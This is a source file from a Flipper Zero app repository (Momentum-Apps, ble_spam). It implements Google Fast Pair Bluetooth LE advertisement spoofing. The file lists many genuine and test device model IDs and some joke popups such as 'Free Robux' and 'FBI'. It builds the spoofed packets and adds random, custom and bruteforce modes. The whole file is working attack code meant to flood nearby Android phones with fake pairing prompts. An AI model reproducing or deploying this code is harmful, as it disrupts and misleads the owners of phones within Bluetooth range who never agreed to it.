Главная Обзор Помощь
Вход
torambo.com
/
Momentum-Apps
2
0
Ответвить 0
Файлы Задачи 0 Запросы на слияние 0 Вики
Дерево: f79de7fb29
Ветки Метки
Momentum-Apps
/
ble_spam
/
protocols
/
fastpair.c

fastpair.c 15 KB
История Исходник

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369370371372373374375376377378379380381382383384385386387388389390391392393394395396397398399400401402403404405406407408409410411412413414415416417418419420421422423424425426427428429430431432433434435436437438439440441442443444445446447448449450451452453454455456457 
  1. #include "fastpair.h"
    2. 

  2. #include "_protocols.h"
    3. 

  3. 

  4. // Hacked together by @Willy-JL and @Spooks4576
    5. 

  5. // Documentation at https://developers.google.com/nearby/fast-pair/specifications/introduction
    6. 

  6. 

  7. const struct {
    8. 

  8.     uint32_t value;
    9. 

  9.     const char* name;
    10. 

  10. } models[] = {
    11. 

  11.     // Genuine non-production/forgotten (good job Google)
    12. 

  12.     {0x0001F0, "Bisto CSR8670 Dev Board"},
    13. 

  13.     {0x000047, "Arduino 101"},
    14. 

  14.     {0x470000, "Arduino 101 2"},
    15. 

  15.     {0x00000A, "Anti-Spoof Test"},
    16. 

  16.     {0x0A0000, "Anti-Spoof Test 2"},
    17. 

  17.     {0x00000B, "Google Gphones"},
    18. 

  18.     {0x0B0000, "Google Gphones 2"},
    19. 

  19.     {0x0C0000, "Google Gphones 3"},
    20. 

  20.     {0x00000D, "Test 00000D"},
    21. 

  21.     {0x000007, "Android Auto"},
    22. 

  22.     {0x070000, "Android Auto 2"},
    23. 

  23.     {0x000008, "Foocorp Foophones"},
    24. 

  24.     {0x080000, "Foocorp Foophones 2"},
    25. 

  25.     {0x000009, "Test Android TV"},
    26. 

  26.     {0x090000, "Test Android TV 2"},
    27. 

  27.     {0x000035, "Test 000035"},
    28. 

  28.     {0x350000, "Test 000035 2"},
    29. 

  29.     {0x000048, "Fast Pair Headphones"},
    30. 

  30.     {0x480000, "Fast Pair Headphones 2"},
    31. 

  31.     {0x000049, "Fast Pair Headphones 3"},
    32. 

  32.     {0x490000, "Fast Pair Headphones 4"},
    33. 

  33.     {0x001000, "LG HBS1110"},
    34. 

  34.     {0x00B727, "Smart Controller 1"},
    35. 

  35.     {0x01E5CE, "BLE-Phone"},
    36. 

  36.     {0x0200F0, "Goodyear"},
    37. 

  37.     {0x00F7D4, "Smart Setup"},
    38. 

  38.     {0xF00002, "Goodyear"},
    39. 

  39.     {0xF00400, "T10"},
    40. 

  40.     {0x1E89A7, "ATS2833_EVB"},
    41. 

  41. 

  42.     // Phone setup
    43. 

  43.     {0x00000C, "Google Gphones Transfer"},
    44. 

  44.     {0x0577B1, "Galaxy S23 Ultra"},
    45. 

  45.     {0x05A9BC, "Galaxy S20+"},
    46. 

  46. 

  47.     // Genuine devices
    48. 

  48.     {0xCD8256, "Bose NC 700"},
    49. 

  49.     {0x0000F0, "Bose QuietComfort 35 II"},
    50. 

  50.     {0xF00000, "Bose QuietComfort 35 II 2"},
    51. 

  51.     {0x821F66, "JBL Flip 6"},
    52. 

  52.     {0xF52494, "JBL Buds Pro"},
    53. 

  53.     {0x718FA4, "JBL Live 300TWS"},
    54. 

  54.     {0x0002F0, "JBL Everest 110GA"},
    55. 

  55.     {0x92BBBD, "Pixel Buds"},
    56. 

  56.     {0x000006, "Google Pixel buds"},
    57. 

  57.     {0x060000, "Google Pixel buds 2"},
    58. 

  58.     {0xD446A7, "Sony XM5"},
    59. 

  59.     {0x2D7A23, "Sony WF-1000XM4"},
    60. 

  60.     {0x0E30C3, "Razer Hammerhead TWS"},
    61. 

  61.     {0x72EF8D, "Razer Hammerhead TWS X"},
    62. 

  62.     {0x72FB00, "Soundcore Spirit Pro GVA"},
    63. 

  63.     {0x0003F0, "LG HBS-835S"},
    64. 

  64.     {0x002000, "AIAIAI TMA-2 (H60)"},
    65. 

  65.     {0x003000, "Libratone Q Adapt On-Ear"},
    66. 

  66.     {0x003001, "Libratone Q Adapt On-Ear 2"},
    67. 

  67.     {0x00A168, "boAt  Airdopes 621"},
    68. 

  68.     {0x00AA48, "Jabra Elite 2"},
    69. 

  69.     {0x00AA91, "Beoplay E8 2.0"},
    70. 

  70.     {0x00C95C, "Sony WF-1000X"},
    71. 

  71.     {0x01EEB4, "WH-1000XM4"},
    72. 

  72.     {0x02AA91, "B&O Earset"},
    73. 

  73.     {0x01C95C, "Sony WF-1000X"},
    74. 

  74.     {0x02D815, "ATH-CK1TW"},
    75. 

  75.     {0x035764, "PLT V8200 Series"},
    76. 

  76.     {0x038CC7, "JBL TUNE760NC"},
    77. 

  77.     {0x02DD4F, "JBL TUNE770NC"},
    78. 

  78.     {0x02E2A9, "TCL MOVEAUDIO S200"},
    79. 

  79.     {0x035754, "Plantronics PLT_K2"},
    80. 

  80.     {0x02C95C, "Sony WH-1000XM2"},
    81. 

  81.     {0x038B91, "DENON AH-C830NCW"},
    82. 

  82.     {0x02F637, "JBL LIVE FLEX"},
    83. 

  83.     {0x02D886, "JBL REFLECT MINI NC"},
    84. 

  84.     {0xF00000, "Bose QuietComfort 35 II"},
    85. 

  85.     {0xF00001, "Bose QuietComfort 35 II"},
    86. 

  86.     {0xF00201, "JBL Everest 110GA"},
    87. 

  87.     {0xF00204, "JBL Everest 310GA"},
    88. 

  88.     {0xF00209, "JBL LIVE400BT"},
    89. 

  89.     {0xF00205, "JBL Everest 310GA"},
    90. 

  90.     {0xF00200, "JBL Everest 110GA"},
    91. 

  91.     {0xF00208, "JBL Everest 710GA"},
    92. 

  92.     {0xF00207, "JBL Everest 710GA"},
    93. 

  93.     {0xF00206, "JBL Everest 310GA"},
    94. 

  94.     {0xF0020A, "JBL LIVE400BT"},
    95. 

  95.     {0xF0020B, "JBL LIVE400BT"},
    96. 

  96.     {0xF0020C, "JBL LIVE400BT"},
    97. 

  97.     {0xF00203, "JBL Everest 310GA"},
    98. 

  98.     {0xF00202, "JBL Everest 110GA"},
    99. 

  99.     {0xF00213, "JBL LIVE650BTNC"},
    100. 

  100.     {0xF0020F, "JBL LIVE500BT"},
    101. 

  101.     {0xF0020E, "JBL LIVE500BT"},
    102. 

  102.     {0xF00214, "JBL LIVE650BTNC"},
    103. 

  103.     {0xF00212, "JBL LIVE500BT"},
    104. 

  104.     {0xF0020D, "JBL LIVE400BT"},
    105. 

  105.     {0xF00211, "JBL LIVE500BT"},
    106. 

  106.     {0xF00215, "JBL LIVE650BTNC"},
    107. 

  107.     {0xF00210, "JBL LIVE500BT"},
    108. 

  108.     {0xF00305, "LG HBS-1500"},
    109. 

  109.     {0xF00304, "LG HBS-1010"},
    110. 

  110.     {0xF00308, "LG HBS-1125"},
    111. 

  111.     {0xF00303, "LG HBS-930"},
    112. 

  112.     {0xF00306, "LG HBS-1700"},
    113. 

  113.     {0xF00300, "LG HBS-835S"},
    114. 

  114.     {0xF00309, "LG HBS-2000"},
    115. 

  115.     {0xF00302, "LG HBS-830"},
    116. 

  116.     {0xF00307, "LG HBS-1120"},
    117. 

  117.     {0xF00301, "LG HBS-835"},
    118. 

  118.     {0xF00E97, "JBL VIBE BEAM"},
    119. 

  119.     {0x04ACFC, "JBL WAVE BEAM"},
    120. 

  120.     {0x04AA91, "Beoplay H4"},
    121. 

  121.     {0x04AFB8, "JBL TUNE 720BT"},
    122. 

  122.     {0x05A963, "WONDERBOOM 3"},
    123. 

  123.     {0x05AA91, "B&O Beoplay E6"},
    124. 

  124.     {0x05C452, "JBL LIVE220BT"},
    125. 

  125.     {0x05C95C, "Sony WI-1000X"},
    126. 

  126.     {0x0602F0, "JBL Everest 310GA"},
    127. 

  127.     {0x0603F0, "LG HBS-1700"},
    128. 

  128.     {0x1E8B18, "SRS-XB43"},
    129. 

  129.     {0x1E955B, "WI-1000XM2"},
    130. 

  130.     {0x1EC95C, "Sony WF-SP700N"},
    131. 

  131.     {0x1ED9F9, "JBL WAVE FLEX"},
    132. 

  132.     {0x1EE890, "ATH-CKS30TW WH"},
    133. 

  133.     {0x1EEDF5, "Teufel REAL BLUE TWS 3"},
    134. 

  134.     {0x1F1101, "TAG Heuer Calibre E4 45mm"},
    135. 

  135.     {0x1F181A, "LinkBuds S"},
    136. 

  136.     {0x1F2E13, "Jabra Elite 2"},
    137. 

  137.     {0x1F4589, "Jabra Elite 2"},
    138. 

  138.     {0x1F4627, "SRS-XG300"},
    139. 

  139.     {0x1F5865, "boAt Airdopes 441"},
    140. 

  140.     {0x1FBB50, "WF-C700N"},
    141. 

  141.     {0x1FC95C, "Sony WF-SP700N"},
    142. 

  142.     {0x1FE765, "TONE-TF7Q"},
    143. 

  143.     {0x1FF8FA, "JBL REFLECT MINI NC"},
    144. 

  144.     {0x201C7C, "SUMMIT"},
    145. 

  145.     {0x202B3D, "Amazfit PowerBuds"},
    146. 

  146.     {0x20330C, "SRS-XB33"},
    147. 

  147.     {0x003B41, "M&D MW65"},
    148. 

  148.     {0x003D8A, "Cleer FLOW II"},
    149. 

  149.     {0x005BC3, "Panasonic RP-HD610N"},
    150. 

  150.     {0x008F7D, "soundcore Glow Mini"},
    151. 

  151.     {0x00FA72, "Pioneer SE-MS9BN"},
    152. 

  152.     {0x0100F0, "Bose QuietComfort 35 II"},
    153. 

  153.     {0x011242, "Nirvana Ion"},
    154. 

  154.     {0x013D8A, "Cleer EDGE Voice"},
    155. 

  155.     {0x01AA91, "Beoplay H9 3rd Generation"},
    156. 

  156.     {0x038F16, "Beats Studio Buds"},
    157. 

  157.     {0x039F8F, "Michael Kors Darci 5e"},
    158. 

  158.     {0x03AA91, "B&O Beoplay H8i"},
    159. 

  159.     {0x03B716, "YY2963"},
    160. 

  160.     {0x03C95C, "Sony WH-1000XM2"},
    161. 

  161.     {0x03C99C, "MOTO BUDS 135"},
    162. 

  162.     {0x03F5D4, "Writing Account Key"},
    163. 

  163.     {0x045754, "Plantronics PLT_K2"},
    164. 

  164.     {0x045764, "PLT V8200 Series"},
    165. 

  165.     {0x04C95C, "Sony WI-1000X"},
    166. 

  166.     {0x050F0C, "Major III Voice"},
    167. 

  167.     {0x052CC7, "MINOR III"},
    168. 

  168.     {0x057802, "TicWatch Pro 5"},
    169. 

  169.     {0x0582FD, "Pixel Buds"},
    170. 

  170.     {0x058D08, "WH-1000XM4"},
    171. 

  171.     {0x06AE20, "Galaxy S21 5G"},
    172. 

  172.     {0x06C197, "OPPO Enco Air3 Pro"},
    173. 

  173.     {0x06C95C, "Sony WH-1000XM2"},
    174. 

  174.     {0x06D8FC, "soundcore Liberty 4 NC"},
    175. 

  175.     {0x0744B6, "Technics EAH-AZ60M2"},
    176. 

  176.     {0x07A41C, "WF-C700N"},
    177. 

  177.     {0x07C95C, "Sony WH-1000XM2"},
    178. 

  178.     {0x07F426, "Nest Hub Max"},
    179. 

  179.     {0x0102F0, "JBL Everest 110GA - Gun Metal"},
    180. 

  180.     {0x0202F0, "JBL Everest 110GA - Silver"},
    181. 

  181.     {0x0302F0, "JBL Everest 310GA - Brown"},
    182. 

  182.     {0x0402F0, "JBL Everest 310GA - Gun Metal"},
    183. 

  183.     {0x0502F0, "JBL Everest 310GA - Silver"},
    184. 

  184.     {0x0702F0, "JBL Everest 710GA - Gun Metal"},
    185. 

  185.     {0x0802F0, "JBL Everest 710GA - Silver"},
    186. 

  186.     {0x054B2D, "JBL TUNE125TWS"},
    187. 

  187.     {0x0660D7, "JBL LIVE770NC"},
    188. 

  188.     {0x0103F0, "LG HBS-835"},
    189. 

  189.     {0x0203F0, "LG HBS-830"},
    190. 

  190.     {0x0303F0, "LG HBS-930"},
    191. 

  191.     {0x0403F0, "LG HBS-1010"},
    192. 

  192.     {0x0503F0, "LG HBS-1500"},
    193. 

  193.     {0x0703F0, "LG HBS-1120"},
    194. 

  194.     {0x0803F0, "LG HBS-1125"},
    195. 

  195.     {0x0903F0, "LG HBS-2000"},
    196. 

  196. 

  197.     // Custom debug popups
    198. 

  198.     {0xD99CA1, "Flipper Zero"},
    199. 

  199.     {0x77FF67, "Free Robux"},
    200. 

  200.     {0xAA187F, "Free VBucks"},
    201. 

  201.     {0xDCE9EA, "Rickroll"},
    202. 

  202.     {0x87B25F, "Animated Rickroll"},
    203. 

  203.     {0xF38C02, "Boykisser"},
    204. 

  204.     {0x1448C9, "BLM"},
    205. 

  205.     {0xD5AB33, "Xtreme"},
    206. 

  206.     {0x0C0B67, "Xtreme Cta"},
    207. 

  207.     {0x13B39D, "Talking Sasquach"},
    208. 

  208.     {0xAA1FE1, "ClownMaster"},
    209. 

  209.     {0x7C6CDB, "Obama"},
    210. 

  210.     {0x005EF9, "Ryanair"},
    211. 

  211.     {0xE2106F, "FBI"},
    212. 

  212.     {0xB37A62, "Tesla"},
    213. 

  213. };
    214. 

  214. const uint8_t models_count = COUNT_OF(models);
    215. 

  215. 

  216. static const char* get_name(const Payload* payload) {
    217. 

  217.     UNUSED(payload);
    218. 

  218.     return "FastPair";
    219. 

  219. }
    220. 

  220. 

  221. static void make_packet(uint8_t* _size, uint8_t** _packet, Payload* payload) {
    222. 

  222.     FastpairCfg* cfg = payload ? &payload->cfg.fastpair : NULL;
    223. 

  223. 

  224.     uint32_t model;
    225. 

  225.     switch(cfg ? payload->mode : PayloadModeRandom) {
    226. 

  226.     case PayloadModeRandom:
    227. 

  227.     default:
    228. 

  228.         model = models[rand() % models_count].value;
    229. 

  229.         break;
    230. 

  230.     case PayloadModeValue:
    231. 

  231.         model = cfg->model;
    232. 

  232.         break;
    233. 

  233.     case PayloadModeBruteforce:
    234. 

  234.         model = cfg->model = payload->bruteforce.value;
    235. 

  235.         break;
    236. 

  236.     }
    237. 

  237. 

  238.     uint8_t size = 14;
    239. 

  239.     uint8_t* packet = malloc(size);
    240. 

  240.     uint8_t i = 0;
    241. 

  241. 

  242.     packet[i++] = 3; // Size
    243. 

  243.     packet[i++] = 0x03; // AD Type (Service UUID List)
    244. 

  244.     packet[i++] = 0x2C; // Service UUID (Google LLC, FastPair)
    245. 

  245.     packet[i++] = 0xFE; // ...
    246. 

  246. 

  247.     packet[i++] = 6; // Size
    248. 

  248.     packet[i++] = 0x16; // AD Type (Service Data)
    249. 

  249.     packet[i++] = 0x2C; // Service UUID (Google LLC, FastPair)
    250. 

  250.     packet[i++] = 0xFE; // ...
    251. 

  251.     packet[i++] = (model >> 0x10) & 0xFF;
    252. 

  252.     packet[i++] = (model >> 0x08) & 0xFF;
    253. 

  253.     packet[i++] = (model >> 0x00) & 0xFF;
    254. 

  254. 

  255.     packet[i++] = 2; // Size
    256. 

  256.     packet[i++] = 0x0A; // AD Type (Tx Power Level)
    257. 

  257.     packet[i++] = (rand() % 120) - 100; // -100 to +20 dBm
    258. 

  258. 

  259.     *_size = size;
    260. 

  260.     *_packet = packet;
    261. 

  261. }
    262. 

  262. 

  263. enum {
    264. 

  264.     _ConfigExtraStart = ConfigExtraStart,
    265. 

  265.     ConfigModel,
    266. 

  266.     ConfigInfoRequire,
    267. 

  267.     ConfigCOUNT,
    268. 

  268. };
    269. 

  269. static void config_callback(void* _ctx, uint32_t index) {
    270. 

  270.     Ctx* ctx = _ctx;
    271. 

  271.     scene_manager_set_scene_state(ctx->scene_manager, SceneConfig, index);
    272. 

  272.     switch(index) {
    273. 

  273.     case ConfigModel:
    274. 

  274.         scene_manager_next_scene(ctx->scene_manager, SceneFastpairModel);
    275. 

  275.         break;
    276. 

  276.     case ConfigInfoRequire:
    277. 

  277.         break;
    278. 

  278.     default:
    279. 

  279.         ctx->fallback_config_enter(ctx, index);
    280. 

  280.         break;
    281. 

  281.     }
    282. 

  282. }
    283. 

  283. static void model_changed(VariableItem* item) {
    284. 

  284.     Payload* payload = variable_item_get_context(item);
    285. 

  285.     FastpairCfg* cfg = &payload->cfg.fastpair;
    286. 

  286.     uint8_t index = variable_item_get_current_value_index(item);
    287. 

  287.     if(index) {
    288. 

  288.         index--;
    289. 

  289.         payload->mode = PayloadModeValue;
    290. 

  290.         cfg->model = models[index].value;
    291. 

  291.         variable_item_set_current_value_text(item, models[index].name);
    292. 

  292.     } else {
    293. 

  293.         payload->mode = PayloadModeRandom;
    294. 

  294.         variable_item_set_current_value_text(item, "Random");
    295. 

  295.     }
    296. 

  296. }
    297. 

  297. static void extra_config(Ctx* ctx) {
    298. 

  298.     Payload* payload = &ctx->attack->payload;
    299. 

  299.     FastpairCfg* cfg = &payload->cfg.fastpair;
    300. 

  300.     VariableItemList* list = ctx->variable_item_list;
    301. 

  301.     VariableItem* item;
    302. 

  302.     size_t value_index;
    303. 

  303. 

  304.     item = variable_item_list_add(list, "Model Code", models_count + 1, model_changed, payload);
    305. 

  305.     const char* model_name = NULL;
    306. 

  306.     char model_name_buf[9];
    307. 

  307.     switch(payload->mode) {
    308. 

  308.     case PayloadModeRandom:
    309. 

  309.     default:
    310. 

  310.         model_name = "Random";
    311. 

  311.         value_index = 0;
    312. 

  312.         break;
    313. 

  313.     case PayloadModeValue:
    314. 

  314.         for(uint8_t i = 0; i < models_count; i++) {
    315. 

  315.             if(cfg->model == models[i].value) {
    316. 

  316.                 model_name = models[i].name;
    317. 

  317.                 value_index = i + 1;
    318. 

  318.                 break;
    319. 

  319.             }
    320. 

  320.         }
    321. 

  321.         if(!model_name) {
    322. 

  322.             snprintf(model_name_buf, sizeof(model_name_buf), "%06lX", cfg->model);
    323. 

  323.             model_name = model_name_buf;
    324. 

  324.             value_index = models_count + 1;
    325. 

  325.         }
    326. 

  326.         break;
    327. 

  327.     case PayloadModeBruteforce:
    328. 

  328.         model_name = "Bruteforce";
    329. 

  329.         value_index = models_count + 1;
    330. 

  330.         break;
    331. 

  331.     }
    332. 

  332.     variable_item_set_current_value_index(item, value_index);
    333. 

  333.     variable_item_set_current_value_text(item, model_name);
    334. 

  334. 

  335.     variable_item_list_add(list, "Requires Google services", 0, NULL, NULL);
    336. 

  336. 

  337.     variable_item_list_set_enter_callback(list, config_callback, ctx);
    338. 

  338. }
    339. 

  339. 

  340. static uint8_t config_count(const Payload* payload) {
    341. 

  341.     UNUSED(payload);
    342. 

  342.     return ConfigCOUNT - ConfigExtraStart - 1;
    343. 

  343. }
    344. 

  344. 

  345. const Protocol protocol_fastpair = {
    346. 

  346.     .icon = &I_android,
    347. 

  347.     .get_name = get_name,
    348. 

  348.     .make_packet = make_packet,
    349. 

  349.     .extra_config = extra_config,
    350. 

  350.     .config_count = config_count,
    351. 

  351. };
    352. 

  352. 

  353. static void model_callback(void* _ctx, uint32_t index) {
    354. 

  354.     Ctx* ctx = _ctx;
    355. 

  355.     Payload* payload = &ctx->attack->payload;
    356. 

  356.     FastpairCfg* cfg = &payload->cfg.fastpair;
    357. 

  357.     switch(index) {
    358. 

  358.     case 0:
    359. 

  359.         payload->mode = PayloadModeRandom;
    360. 

  360.         scene_manager_previous_scene(ctx->scene_manager);
    361. 

  361.         break;
    362. 

  362.     case models_count + 1:
    363. 

  363.         scene_manager_next_scene(ctx->scene_manager, SceneFastpairModelCustom);
    364. 

  364.         break;
    365. 

  365.     case models_count + 2:
    366. 

  366.         payload->mode = PayloadModeBruteforce;
    367. 

  367.         payload->bruteforce.counter = 0;
    368. 

  368.         payload->bruteforce.value = cfg->model;
    369. 

  369.         payload->bruteforce.size = 3;
    370. 

  370.         scene_manager_previous_scene(ctx->scene_manager);
    371. 

  371.         break;
    372. 

  372.     default:
    373. 

  373.         payload->mode = PayloadModeValue;
    374. 

  374.         cfg->model = models[index - 1].value;
    375. 

  375.         scene_manager_previous_scene(ctx->scene_manager);
    376. 

  376.         break;
    377. 

  377.     }
    378. 

  378. }
    379. 

  379. void scene_fastpair_model_on_enter(void* _ctx) {
    380. 

  380.     Ctx* ctx = _ctx;
    381. 

  381.     Payload* payload = &ctx->attack->payload;
    382. 

  382.     FastpairCfg* cfg = &payload->cfg.fastpair;
    383. 

  383.     Submenu* submenu = ctx->submenu;
    384. 

  384.     uint32_t selected = 0;
    385. 

  385.     submenu_reset(submenu);
    386. 

  386. 

  387.     submenu_add_item(submenu, "Random", 0, model_callback, ctx);
    388. 

  388.     if(payload->mode == PayloadModeRandom) {
    389. 

  389.         selected = 0;
    390. 

  390.     }
    391. 

  391. 

  392.     bool found = false;
    393. 

  393.     for(uint8_t i = 0; i < models_count; i++) {
    394. 

  394.         submenu_add_item(submenu, models[i].name, i + 1, model_callback, ctx);
    395. 

  395.         if(!found && payload->mode == PayloadModeValue && cfg->model == models[i].value) {
    396. 

  396.             found = true;
    397. 

  397.             selected = i + 1;
    398. 

  398.         }
    399. 

  399.     }
    400. 

  400.     submenu_add_item(submenu, "Custom", models_count + 1, model_callback, ctx);
    401. 

  401.     if(!found && payload->mode == PayloadModeValue) {
    402. 

  402.         selected = models_count + 1;
    403. 

  403.     }
    404. 

  404. 

  405.     submenu_add_item(submenu, "Bruteforce", models_count + 2, model_callback, ctx);
    406. 

  406.     if(payload->mode == PayloadModeBruteforce) {
    407. 

  407.         selected = models_count + 2;
    408. 

  408.     }
    409. 

  409. 

  410.     submenu_set_selected_item(submenu, selected);
    411. 

  411. 

  412.     view_dispatcher_switch_to_view(ctx->view_dispatcher, ViewSubmenu);
    413. 

  413. }
    414. 

  414. bool scene_fastpair_model_on_event(void* _ctx, SceneManagerEvent event) {
    415. 

  415.     UNUSED(_ctx);
    416. 

  416.     UNUSED(event);
    417. 

  417.     return false;
    418. 

  418. }
    419. 

  419. void scene_fastpair_model_on_exit(void* _ctx) {
    420. 

  420.     UNUSED(_ctx);
    421. 

  421. }
    422. 

  422. 

  423. static void model_custom_callback(void* _ctx) {
    424. 

  424.     Ctx* ctx = _ctx;
    425. 

  425.     Payload* payload = &ctx->attack->payload;
    426. 

  426.     FastpairCfg* cfg = &payload->cfg.fastpair;
    427. 

  427.     payload->mode = PayloadModeValue;
    428. 

  428.     cfg->model =
    429. 

  429.         (ctx->byte_store[0] << 0x10) + (ctx->byte_store[1] << 0x08) + (ctx->byte_store[2] << 0x00);
    430. 

  430.     scene_manager_previous_scene(ctx->scene_manager);
    431. 

  431.     scene_manager_previous_scene(ctx->scene_manager);
    432. 

  432. }
    433. 

  433. void scene_fastpair_model_custom_on_enter(void* _ctx) {
    434. 

  434.     Ctx* ctx = _ctx;
    435. 

  435.     Payload* payload = &ctx->attack->payload;
    436. 

  436.     FastpairCfg* cfg = &payload->cfg.fastpair;
    437. 

  437.     ByteInput* byte_input = ctx->byte_input;
    438. 

  438. 

  439.     byte_input_set_header_text(byte_input, "Enter custom Model Code");
    440. 

  440. 

  441.     ctx->byte_store[0] = (cfg->model >> 0x10) & 0xFF;
    442. 

  442.     ctx->byte_store[1] = (cfg->model >> 0x08) & 0xFF;
    443. 

  443.     ctx->byte_store[2] = (cfg->model >> 0x00) & 0xFF;
    444. 

  444. 

  445.     byte_input_set_result_callback(
    446. 

  446.         byte_input, model_custom_callback, NULL, ctx, (void*)ctx->byte_store, 3);
    447. 

  447. 

  448.     view_dispatcher_switch_to_view(ctx->view_dispatcher, ViewByteInput);
    449. 

  449. }
    450. 

  450. bool scene_fastpair_model_custom_on_event(void* _ctx, SceneManagerEvent event) {
    451. 

  451.     UNUSED(_ctx);
    452. 

  452.     UNUSED(event);
    453. 

  453.     return false;
    454. 

  454. }
    455. 

  455. void scene_fastpair_model_custom_on_exit(void* _ctx) {
    456. 

  456.     UNUSED(_ctx);
    457. 

  457. }
    458.